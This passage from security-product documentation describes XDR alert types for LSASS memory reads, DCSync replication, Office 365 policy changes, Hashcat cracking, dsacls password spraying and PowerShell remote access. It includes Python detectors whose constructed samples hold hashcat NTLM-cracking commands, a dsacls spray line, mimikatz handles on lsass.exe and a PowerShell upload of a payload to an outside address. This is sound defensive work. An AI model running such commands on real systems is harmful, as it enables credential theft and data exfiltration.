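    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x2000: "PROCESS_SET_LIMITED_INFORMATION",
}
STANDARD_RIGHTS = {  # generic object rights that also appear in a process mask
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
ALL_KNOWN = {**PROCESS_RIGHTS, **STANDARD_RIGHTS}
PROCESS_VM_READ = 0x0010
SUSPICIOUS_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}   # assumption: classic dump masks


def decode_access_mask(mask: int) -> list[str]:
    """Expand an access mask into the rights it grants, keeping unrecognised bits visible."""
    names = [name for bit, name in ALL_KNOWN.items() if mask & bit]
    leftover = mask & ~sum(ALL_KNOWN)
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:X}")
    return names


def check_lsass_access(event):
    """Return an alert-style record for a memory-reading handle on lsass.exe, else None."""
    if PureWindowsPath(event["TargetImage"]).name.lower() != "lsass.exe":
        return None
    mask = int(event["GrantedAccess"], 16)
    if not (mask & PROCESS_VM_READ) and mask not in SUSPICIOUS_MASKS:
        return None                     # query-only handles (task managers etc.) cannot read memory
    return {
        "xdr_event.name": "mimikatz_mem_scan",
        "hostip": event["hostip"],
        "access_subject": event["SourceImage"],
        "access_mask": f"0x{mask:X}",
        "capabilities": decode_access_mask(mask),
        "known_dump_mask": mask in SUSPICIOUS_MASKS,
    }


LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [   # constructed
    {"hostip": "10.0.0.12", "SourceImage": r"C:\Users\bob\Downloads\mimikatz.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"hostip": "10.0.0.12", "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    {"hostip": "10.0.0.13", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
    {"hostip": "10.0.0.13", "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(check_lsass_access(ev))
```

The decoded capabilities are the triage aid the field description promises: a mask with only PROCESS_VM_READ and PROCESS_QUERY_LIMITED_INFORMATION (0x1010) is a read of LSASS memory, while PROCESS_VM_WRITE or PROCESS_CREATE_THREAD on top of it indicates injection rather than a plain dump. In production, endpoint agents and WerFault.exe open lsass.exe with read access legitimately and are normally allow-listed by source image.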
Mimikatz DCSync
An attempt to replicate Active Directory for the first time on a domain controller, or the first time by that account, has occurred. Evaluate whether the replication is intended and, if not, consider disabling the account involved in the replication and investigate for further signs of compromise.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: OS Credential Dumping (T1003)
- Tags: [Internal, Active Directory]
Event Name
The xdr_event.name for this alert type in the Interflow data is mimikatz_dcsync.
Key Fields and Relevant Data Points
- hostip — IP address of the targeted domain controller
- event_data.SubjectUserSid — source user ID associated with the account attempting replication
- hostip_host — host name of the targeted domain controller
- event_data.SubjectUserName — name of the account that attempted the Active Directory replication
- event_data.SubjectDomainName — domain of the account that attempted the Active Directory replication
Use Case with Data Points
This alert is triggered when replication of an Active Directory domain controller (hostip) occurs for the first time, or is attempted by a user account or computer account (event_data.SubjectUserName) that has rarely (days_silent) or never initiated replication on that DC before. The Interflow includes the IP address of the targeted domain controller (hostip), the account (event_data.SubjectUserName) attempting the replication and its domain (event_data.SubjectDomainName), and the replication operation attempted (event_data.Properties). (For guidance on understanding the GUID in the event_data.Properties field, refer to Microsoft Documentation.)
Validation / Remediation
To triage an alert of this type, consider first verifying whether the Active Directory replication event was expected. If the replication is not intended, then the alert has indicated that a DCSync attack is highly likely. This attack can be very severe, because all password hashes stored on the targeted domain controller might have been dumped. Disable the account involved in the replication as soon as possible and further investigate the account for any signs of compromise.
There is no simple remediation for a confirmed DCSync attack. Evaluate the overall risks of credential leakage and apply appropriate corrective actions, including minimizing accounts with permissions to perform Active Directory replication, and forcing a change of credentials for accounts with weak passwords.
Potential False Positives
The following will trigger an alert:
- Set up of a new DC
- Replication of a DC for the first time
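The replication check and the first-time / rarely-seen logic described in the use case, as an added example that is not Stellar Cyber's code. It reads the event_data.Properties text of Windows Security event 4662 for the three replication control access right GUIDs that Microsoft documents (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set; a DCSync pull of password hashes needs Get-Changes-All) and keeps a last-seen table per domain controller and account. The RARE_AFTER_DAYS threshold, the exact layout of the Properties string and the events themselves are assumptions and constructed samples; the two documented false positives (a new DC, a DC replicating for the first time) show up as the machine-account hits.

```python
"""Added example (not Stellar Cyber code): recognising directory replication in
Windows Security event 4662 and deciding whether it is the first, or a rare,
replication by that account on that domain controller.

The three GUIDs are Microsoft's documented control access rights for
DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and
DS-Replication-Get-Changes-In-Filtered-Set; a DCSync pull of password hashes
requires Get-Changes-All. RARE_AFTER_DAYS is an assumption, as is the exact
layout of the Properties string. The events are constructed samples.
"""
from datetime import datetime, timezone

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
RARE_AFTER_DAYS = 30   # assumption: treat a gap this long as "rarely occurred"


def replication_rights(properties: str) -> list[str]:
    """Pick the replication control-access GUIDs out of the 4662 Properties text."""
    tokens = properties.lower().replace("{", " ").replace("}", " ").split()
    return [REPLICATION_RIGHTS[t] for t in tokens if t in REPLICATION_RIGHTS]


class DCSyncDetector:
    """Tracks, per (domain controller, account SID), when replication was last seen."""

    def __init__(self):
        self.last_seen = {}

    def process(self, ev):
        if ev["event_id"] != 4662:
            return None
        rights = replication_rights(ev["event_data"]["Properties"])
        if not rights:
            return None                                   # 4662 on some other object right
        key = (ev["hostip"], ev["event_data"]["SubjectUserSid"])
        ts = ev["timestamp"]
        previous = self.last_seen.get(key)
        self.last_seen[key] = ts
        days_silent = None if previous is None else (ts - previous).days
        if days_silent is not None and days_silent < RARE_AFTER_DAYS:
            return None                                   # routine, recently seen replication
        name = ev["event_data"]["SubjectUserName"]
        return {
            "xdr_event.name": "mimikatz_dcsync",
            "hostip": ev["hostip"],
            "hostip_host": ev["hostip_host"],
            "event_data.SubjectUserSid": key[1],
            "event_data.SubjectUserName": name,
            "event_data.SubjectDomainName": ev["event_data"]["SubjectDomainName"],
            "event_data.Properties": rights,
            "days_silent": days_silent,                   # None on a first-ever replication
            "is_machine_account": name.endswith("$"),     # DC computer accounts replicate legitimately
        }


def _event(day, sid, name, properties, event_id=4662):
    """Constructed record against domain controller DC01 (10.0.0.10) in 2024."""
    return {"event_id": event_id, "hostip": "10.0.0.10", "hostip_host": "DC01",
            "timestamp": datetime(2024, *day, tzinfo=timezone.utc),
            "event_data": {"SubjectUserSid": sid, "SubjectUserName": name,
                           "SubjectDomainName": "CORP", "Properties": properties}}


GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
DOMAIN_DNS_CLASS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # object class GUID listed alongside the rights
DC_REPL = f"Control Access\n\t{GET_CHANGES}\n\t{GET_CHANGES_ALL}\n\t{DOMAIN_DNS_CLASS}"


def build_samples():
    """DC02$ replicating normally, then after a long gap; then a user account doing it for the first time."""
    return [
        _event((1, 1), "S-1-5-21-1-2-3-1001", "DC02$", DC_REPL),            # first seen: alert
        _event((1, 2), "S-1-5-21-1-2-3-1001", "DC02$", DC_REPL),            # one day later: routine
        _event((3, 15), "S-1-5-21-1-2-3-1001", "DC02$", DC_REPL),           # 73 days silent: alert
        _event((3, 15), "S-1-5-21-1-2-3-1105", "bob", DC_REPL),             # user account, never before: alert
        _event((3, 15), "S-1-5-21-1-2-3-1105", "bob", f"Read Property\n\t{DOMAIN_DNS_CLASS}"),  # no replication right
        _event((3, 16), "S-1-5-21-1-2-3-1105", "bob", DC_REPL, event_id=4674),  # different event ID
    ]


if __name__ == "__main__":
    detector = DCSyncDetector()
    for ev in build_samples():
        print(detector.process(ev))
```

The is_machine_account flag is the triage shortcut for the documented false positives: a freshly promoted DC shows up exactly like the DC02$ records, whereas a user account such as bob holding Get-Changes-All on the domain object is the case the validation text tells you to treat as a likely DCSync.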
Office 365 Access Governance Anomaly
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Valid Accounts (Privilege Escalation) and Microsoft 365: Account Manipulation.
Office 365 generated an access governance alert, which might indicate a change in Exchange admin privileges. Check with the user to make sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: Privilege Escalation (TA0004)
- Technique: Valid Accounts (T1078)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_access_governance_alert.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- Name — alert type description
- Source — source that generated the alert seen by Stellar Cyber
- srcip — source IP address
Use Case with Data Points
For each Office 365 account (srcip_usersid), access governance alerts detected by Office 365 are checked periodically. If Office 365 finds an access governance alert, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid), this alert type description (Name), the alerting source (Source), and the source IP address (srcip).
Office 365 Admin Audit Logging Disabled
Office 365 admin audit logging was disabled. Make sure this change was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Impair Defenses (T1562)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_admin_audit_logging_disabled.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationName — organization with audit logging
Use Case with Data Points
Office 365 monitors each Office 365 account (srcip_usersid) for admin audit logging status. If admin audit logging is disabled, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid) and organization name (OrganizationName).
Office 365 Blocked User
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Valid Accounts (Initial Access).
The Office 365 Security Compliance Center discovered a user exceeding the sending limits of the service or outbound spam policies and blocked the user from sending email. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] XDR UBA (XTA0004)
- Technique: XDR Suspicious User (XT4008)
- Tags: [External]
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_blocked_user.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- Source — alerting source
- srcip — source IP address of the account
Use Case with Data Points
Office 365 monitors email sending actions for each Office 365 account (srcip_usersid). If an account exceeds the sending limit, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid), alerting source (Source), and source IP address (srcip).
Office 365 Content Filter Policy Changed
The Microsoft Exchange content policy was changed. An overly permissive content policy can allow spammers to send your organization unwanted email. Make sure this change was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Persistence (TA0003)
- Technique: Account Manipulation (T1098)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_content_filter_policy_changed.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationId — ID of the organization with the Microsoft content policy change
- OrganizationName — organization with the Microsoft content policy change
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid) in each organization (OrganizationId) for a Microsoft Exchange content policy change. If a change is detected, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid), organization ID (OrganizationId), and organization name (OrganizationName).
Office 365 Data Exfiltration Attempt Anomaly
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Exfiltration Over Web Service.
The Office 365 Security Compliance Center discovered a data exfiltration attempt. Office 365 then blocked, quarantined, encrypted, or applied a hold on the possible exfiltration. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Exfiltration & Impact
- Tactic: Exfiltration (TA0010)
- Technique: Exfiltration Over Web Service (T1567)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_data_exfiltration_attempt.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- Name — alert type description
- Source — reporting source
- srcip — source IP address
Use Case with Data Points
Office 365 periodically checks each Office 365 account (srcip_usersid) for data exfiltration attempts. If data exfiltration is detected, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid), this alert type description (Name), reporting source (Source), and source IP address (srcip).
Office 365 Data Loss Prevention
This alert type is deprecated as of the 4.3.7 release. It is replaced by Microsoft 365 alert integration. See Microsoft 365: Exfiltration Over Web Service.
The Office 365 Security Compliance Center discovered data loss. Office 365 then blocked, quarantined, encrypted, or applied a hold on the possible exfiltration. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Exfiltration & Impact
- Tactic: Exfiltration (TA0010)
- Technique: Exfiltration Over Web Service (T1567)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_data_loss_prevention.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- Name — alert type description
- Source — reporting source
- srcip — source IP address
Use Case with Data Points
Office 365 periodically checks each Office 365 account (srcip_usersid) for data loss. If data loss is detected, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid), this alert type description (Name), reporting source (Source), and source IP address (srcip).
Office 365 File Sharing with Outside Entities
An Office 365 account shared multiple files with entities outside of the organization. Check with the user to make sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Exfiltration & Impact
- Tactic: Exfiltration (TA0010)
- Technique: Transfer Data to Cloud Account (T1537)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_outside_entity_file_sharing.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- srcip — source IP address of the sharing action
- srcip_host — source host name
- srcip_geo.countryName — source country
Use Case with Data Points
Office 365 monitors sharing with outside entities for each Office 365 account (srcip_usersid). If an account shares multiple files with outside entities, an alert is triggered. A sample Interflow includes the user ID (srcip_usersid), source IP address (srcip), and source country (srcip_geo.countryName).
Office 365 Malware Filter Policy Changed
The Microsoft Exchange malware filter policy changed. An overly permissive malware filter policy can allow attackers to send malicious attachments to your organization. Make sure this change was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Impair Defenses (T1562)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_malware_filter_policy_changed.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationId — ID of the organization with the Microsoft Exchange malware policy change
- OrganizationName — organization with the Microsoft Exchange malware policy change
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid) in every organization (OrganizationId) for Microsoft Exchange malware policy changes. If a change is discovered, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid), organization ID (OrganizationId), and organization name (OrganizationName).
Office 365 Multiple Files Restored
Office 365 detected that multiple files were restored in a short period. Check with the user.
XDR Kill Chain
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_multi_file_restore.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- EventSource — event source
- srcip — source IP address that caused the restore
- srcip_host — source host name
Use Case with Data Points
Office 365 periodically checks file restore records. If multiple file restore records are detected within a short period, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid), event source (EventSource), and source IP address (srcip).
Office 365 Multiple Users Deleted
Office 365 detected that multiple users were deleted in a short period. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Exfiltration & Impact
- Tactic: Impact (TA0040)
- Technique: Account Access Removal (T1531)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_multi_user_deleted.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- EventSource — event source
- srcip — source IP address that performed the deletion
Use Case with Data Points
Office 365 periodically checks user deletion records. If multiple users were deleted within a short period, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid), event source (EventSource), and source IP address (srcip).
Office 365 Network Security Configuration Changed
Office 365 identified a change to your organization's network security configuration, which is uncommon. Make sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Persistence (TA0003)
- Technique: Account Manipulation (T1098)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_security_conf_changed.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationId — ID of the organization whose security configuration changed
- OrganizationName — name of the organization whose security configuration changed
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid) in every organization (OrganizationId) for network security configuration changes. If a change is detected, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid), organization ID (OrganizationId), and organization name (OrganizationName).
Office 365 Password Policy Changed
Office 365 identified a change to your organization's password policy, which is uncommon. Make sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Modify Authentication Process (T1556)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_password_policy_changed.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationId — ID of the organization whose password policy changed
- OrganizationName — name of the organization whose password policy changed
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid) in every organization (OrganizationId) for password policy changes. If a change is detected, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid), organization ID (OrganizationId), and organization name (OrganizationName).
Office 365 Sharing Policy Changed
Office 365 identified a change to your organization's sharing policy, which is uncommon. Make sure this was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Persistence (TA0003)
- Technique: Account Manipulation (T1098)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_sharing_policy_changed.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationId — ID of the organization whose sharing policy changed
- OrganizationName — name of the organization whose sharing policy changed
Use Case with Data Points
Office 365 monitors all Office 365 accounts (srcip_usersid) in every organization (OrganizationId) for sharing policy changes. If a change is detected, an alert is triggered. A sample Interflow includes the Office 365 account ID (srcip_usersid), organization ID (OrganizationId), and organization name (OrganizationName).
Office 365 User Network Admin Changed
The Office 365 account’s network admin information was changed. Make sure this change was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Persistence (TA0003)
- Technique: Account Manipulation (T1098)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is office365_user_network_admin_changed.
Key Fields and Relevant Data Points
- srcip_usersid — key ID for the Office 365 account
- OrganizationName — name of the organization
Use Case with Data Points
Office 365 monitors the network admin information for each Office 365 account (srcip_usersid). If changes to the network admin are discovered, an alert is triggered. A sample Interflow includes the account ID (srcip_usersid) and organization name (OrganizationName).
Password Cracking with Hashcat
A user from a Windows host executed a command-line script that launched either the hashcat.exe command or a command using known Hashcat parameters (-a -m 1000 -r). The Hashcat command is known to use a SAM file from the Windows registry along with a password list to crack passwords.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Hashcat]
Event Name
The xdr_event.name for this alert type in the Interflow data is password_cracking_with_hashcat.
Key Fields and Relevant Data Points
- hostip — device internal IP address
- event_data.Image — process running the Hashcat tool
- event_data.CommandLine — command used to run the tool
- computer_name — name of the Windows host
Use Case with Data Points
This alert is triggered if a Windows host (hostip) executes a PowerShell script whose context includes one or more flags (event_data.Image or event_data.CommandLine) indicating use of the Hashcat password cracking tool. The Interflow includes the IP address of the Windows host (hostip), the host name (computer_name), and the script image (event_data.Image) or script payload (event_data.CommandLine).
Validation / Remediation
Check the body of the PowerShell script reported on the Windows host to determine whether its contents are actually malicious. If malicious, consider quarantining the host.
Potential False Positives
Running any executable named hashcat.exe, or any command that uses the Hashcat signature parameter list (-a -m 1000 -r).
Password Spraying Attempts Using Dsacls
A user from a Windows host executed a command-line script to launch a command that by name and parameter list indicates an attempt to abuse dsacls.exe for password spraying.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [Internal] Defense Evasion (TA0005)
- Technique: System Binary Proxy Execution (T1218)
- Tags: [Password Spray;Dsacls]
Event Name
The xdr_event.name for this alert type in the Interflow data is password_spraying_attempts_using_dsacls.
Key Fields and Relevant Data Points
- hostip — device internal IP address
- event_data.Image — process running dsacls for password cracking
- event_data.CommandLine — command used to run the tool
- event_data.OriginalFileName — actual file name that was executed
- computer_name — name of the Windows host
Use Case with Data Points
This alert is triggered if a Windows host (hostip) executes dsacls.exe with a context that includes one or more flags (event_data.Image, event_data.CommandLine, or event_data.OriginalFileName including /user and /passwd as parameters). This indicates possible use of dsacls as a password spraying tool. The Interflow includes the IP address of the Windows host (hostip), the host name (computer_name), the script image (event_data.Image) or the original file name (event_data.OriginalFileName), and the script command line (event_data.CommandLine).
Validation / Remediation
Check whether the usage was actually malicious. If so, consider quarantining the Windows host.
Potential False Positives
This alert can also be triggered by legitimate use of dsacls to bind to an LDAP session.
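The following is an added example, not Stellar Cyber code, that implements the two command-line signatures described in the Password Cracking with Hashcat and Password Spraying Attempts Using Dsacls use cases above as plain matching rules over the page's fields (hostip, computer_name, event_data.Image, event_data.OriginalFileName, event_data.CommandLine). The process-creation records are constructed; the tokenizer and the RULES table are this example's own design, not the product's rule format.

```python
"""
Added example, not Stellar Cyber code: command-line signature checks for the
Password Cracking with Hashcat and Password Spraying Attempts Using Dsacls use
cases above, run over constructed process-creation records reduced to the
fields the page names (hostip, computer_name, event_data.Image,
event_data.OriginalFileName, event_data.CommandLine).
"""
import ntpath
import shlex


def _basename(path):
    return ntpath.basename(path or "").lower()


def _tokens(cmdline):
    # posix=False keeps "quoted args" and backslashes intact on Windows command
    # lines; fall back to plain whitespace splitting on unbalanced quotes.
    try:
        return [t.lower() for t in shlex.split(cmdline or "", posix=False)]
    except ValueError:
        return (cmdline or "").lower().split()


def matches_hashcat(ev):
    """Image named hashcat.exe, or the page's parameter signature -a -m 1000 -r."""
    if _basename(ev.get("event_data.Image")) == "hashcat.exe":
        return True
    toks = _tokens(ev.get("event_data.CommandLine"))
    ntlm_mode = any(
        toks[i] == "-m1000" or (toks[i] == "-m" and i + 1 < len(toks) and toks[i + 1] == "1000")
        for i in range(len(toks))
    )
    return "-a" in toks and "-r" in toks and ntlm_mode


def matches_dsacls_spray(ev):
    """dsacls.exe (by image or original file name) invoked with /user and /passwd."""
    names = {_basename(ev.get("event_data.Image")), _basename(ev.get("event_data.OriginalFileName"))}
    if "dsacls.exe" not in names:
        return False
    toks = _tokens(ev.get("event_data.CommandLine"))
    return any(t.startswith("/user") for t in toks) and any(t.startswith("/passwd") for t in toks)


RULES = [
    ("password_cracking_with_hashcat", matches_hashcat),
    ("password_spraying_attempts_using_dsacls", matches_dsacls_spray),
]


def evaluate(events):
    """Return (xdr_event.name, hostip, computer_name, command line) for each match."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev["hostip"], ev["computer_name"], ev["event_data.CommandLine"]))
    return hits


def _ev(image, cmdline, original=None):
    """Constructed record; OriginalFileName defaults to the image's file name."""
    return {
        "hostip": "10.0.1.20",
        "computer_name": "WS-FINANCE-07",
        "event_data.Image": image,
        "event_data.OriginalFileName": original or ntpath.basename(image),
        "event_data.CommandLine": cmdline,
    }


# Constructed sample events. The second record is why the parameter signature
# matters: the binary was renamed, so the image name alone would miss it. The
# dsacls password is a placeholder.
SAMPLE_EVENTS = [
    _ev(r"C:\Tools\hashcat.exe", "hashcat.exe -m 1000 -a 0 hashes.txt wordlist.txt"),
    _ev(r"C:\Users\Public\hc.exe", r"hc.exe -a 0 -m 1000 -r rules\best64.rule hashes.txt wordlist.txt"),
    _ev(r"C:\Windows\System32\dsacls.exe",
        r'dsacls.exe "CN=Finance,OU=Groups,DC=corp,DC=example" /user:corp\jsmith /passwd:PLACEHOLDER'),
    _ev(r"C:\Windows\System32\dsacls.exe", 'dsacls.exe "CN=Finance,OU=Groups,DC=corp,DC=example"'),
    _ev(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The dsacls rule checks both event_data.Image and event_data.OriginalFileName, which is what lets it keep firing when the binary is copied under another name; as the false-positive note says, a hit still needs the analyst to confirm that the /user and /passwd arguments were not a legitimate LDAP bind.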
Potentially Malicious Windows Event
The Potentially Malicious Windows Event rules are used to identify suspicious activity in Windows events. This is a generic rule name; any one or more of these rules will trigger the Potentially Malicious Windows Event alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_malicious_event.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Potentially Malicious Event Alert Type
PowerShell Remote Access
A Windows host executed a PowerShell script interacting with a remote host. Investigate the script and the remote host to determine whether the script is malicious. If so, consider quarantining the host.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Execution (TA0002)
- Technique: Command and Scripting Interpreter (T1059)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is powershell_cnc.
Key Fields and Relevant Data Points
- srcip — source IP address of the Windows host
- remote_ip — IP address of the remote host involved in the script
- event_data.ScriptBlockText — contents of the PowerShell script
Use Case with Data Points
If a Windows host (srcip) executes a PowerShell script that includes potential communication (event_data.ScriptBlockText) with a remote host (remote_ip), an alert is triggered. The Interflow includes the IP address of the Windows host (srcip), the script body (event_data.ScriptBlockText), and the remote host IP address (remote_ip).
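The following is an added example, not Stellar Cyber code, showing one way to derive the remote_ip field from event_data.ScriptBlockText for the use case above: IPv4 literals are pulled out of the script body, loopback and other non-routable addresses and the host's own srcip are discarded, and the remainder is reported with a note on whether it is inside the RFC 1918 ranges. The script blocks are constructed (addresses come from the documentation ranges), and the NETWORK_INDICATORS list is an assumption used only to annotate the alert, not a condition for raising it.

```python
"""
Added example, not Stellar Cyber code: extracting candidate remote hosts from
event_data.ScriptBlockText for the PowerShell Remote Access use case above.
The script blocks and addresses are constructed (documentation address ranges);
the cmdlet list is an assumption used only to annotate the alert.
"""
import ipaddress
import re

IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Cmdlets and .NET types that usually carry a remote endpoint. Their presence
# is reported with the alert for the analyst but is not required to raise it.
NETWORK_INDICATORS = ("invoke-webrequest", "invoke-restmethod", "net.webclient",
                      "sockets.tcpclient", "invoke-command", "new-pssession", "copy-item")


def is_internal(ip):
    return any(ipaddress.IPv4Address(ip) in net for net in RFC1918)


def extract_remote_ips(script_block_text, srcip):
    """IPv4 literals in the script that are routable and are not the host itself."""
    remote = []
    for literal in IPV4.findall(script_block_text):
        try:
            ip = ipaddress.IPv4Address(literal)
        except ValueError:          # e.g. 999.1.1.1 matched by the regex
            continue
        if ip.is_loopback or ip.is_link_local or ip.is_unspecified or ip.is_multicast:
            continue
        if str(ip) == srcip or str(ip) in remote:
            continue
        remote.append(str(ip))
    return remote


def check_script_block(ev):
    """Return an alert dict when the script block references a remote host, else None."""
    text = ev["event_data.ScriptBlockText"]
    remote = extract_remote_ips(text, ev["srcip"])
    if not remote:
        return None
    lowered = text.lower()
    return {
        "xdr_event.name": "powershell_cnc",
        "srcip": ev["srcip"],
        "remote_ip": remote,
        "external": [ip for ip in remote if not is_internal(ip)],
        "network_indicators": [n for n in NETWORK_INDICATORS if n in lowered],
    }


# Constructed script block records (event 4104 style) from one workstation.
SAMPLE_EVENTS = [
    {"srcip": "10.0.1.20", "event_data.ScriptBlockText":
        '$r = Invoke-RestMethod -Uri "http://203.0.113.10:8080/api/upload" -Method Post -Body $payload'},
    {"srcip": "10.0.1.20", "event_data.ScriptBlockText":
        "Test-Connection -ComputerName 127.0.0.1 -Count 1; Get-Date"},
    {"srcip": "10.0.1.20", "event_data.ScriptBlockText":
        r"Copy-Item -Path \\10.0.0.7\share\config.xml -Destination C:\temp\config.xml"},
    {"srcip": "10.0.1.20", "event_data.ScriptBlockText":
        'Write-Host "reporting from 10.0.1.20"; Get-Process | Select-Object -First 5'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(check_script_block(ev))
```

Host names and URLs without an IP literal are deliberately out of scope here; resolving them would need DNS or proxy logs, which is exactly the correlation the validation guidance above asks the analyst to do by hand when investigating the remote host.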
Process Anomaly
A process has been launched an anomalously large number of times. Investigate the process and the user to see if this is expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
